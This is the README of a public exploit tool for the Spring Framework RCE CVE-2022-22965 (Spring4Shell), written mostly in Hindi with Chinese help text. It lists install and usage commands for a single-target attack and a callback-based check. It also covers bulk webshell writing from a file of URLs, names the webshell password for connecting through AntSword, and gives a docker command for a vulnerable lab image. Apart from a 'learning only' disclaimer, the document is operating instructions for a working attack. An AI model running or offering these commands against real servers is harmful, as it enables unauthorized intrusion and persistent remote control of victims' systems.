
Spring फ्रेमवर्क RCE भेद्यता CVE-2022-22965
प्रभावित क्षेत्र: JDK>=9 के स्प्रिंग फ्रेमवर्क और व्युत्पन्न फ्रेमवर्क
स्क्रिप्ट केवल सीखने के उद्देश्य के लिए है, यदि अन्य उपयोगों में लाया जाए तो कानूनी जिम्मेदारी लेखक से संबंधित नहीं है
pip3 install -r requirements.txt
$ python3 spring-core-rce.py -h
.----..-.-. .---. .-..-. .-..----. .----. .---. .---. .----. .---. .----..----.
{ {__-`| } }}} }}_}{ || \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\ {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-' `-'-' `-'`-' `-'`----' `----' `---' `-'-' `----' `-'-' `----'`----'
Spring framework Core RCE
By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]
Spring framework Core 0day RCE 帮助指南
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 指定url
-s SYSTEM, --system SYSTEM
指定目标主机操作系统,默认linux,参数为win/linux
-r FILE, --file FILE 指定url文件,批量写马
हानिरहित जांच
-u,--url या -f,--file का उपयोग करके बल्क जांच
-c,--check, पैरामीटर स्वयं-निर्मित HTTP सेवा है,
python3 -m http.server 80का उपयोग करके तेज़ी से एक वेब सर्वर बनाया जा सकता हैमुख्य रूप से आंतरिक नेटवर्क में उपयोग किया जाता है जब हानिरहित भेद्यता जांच की आवश्यकता होती है
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

-u का उपयोग करके url निर्दिष्ट करें, -s का उपयोग करके ऑपरेटिंग सिस्टम निर्दिष्ट करें। पैरामीटर: linux या win, डिफ़ॉल्ट linux है।
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"


-r का उपयोग करके बल्क में वेबशेल लिखें, एंट स्वॉर्ड से कनेक्ट करें, पासवर्ड k3rwin है।
python3 spring-core-rce.py -r "urls.txt"


docker pull vulfocus/spring-core-rce-2022-03-29:latest
docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29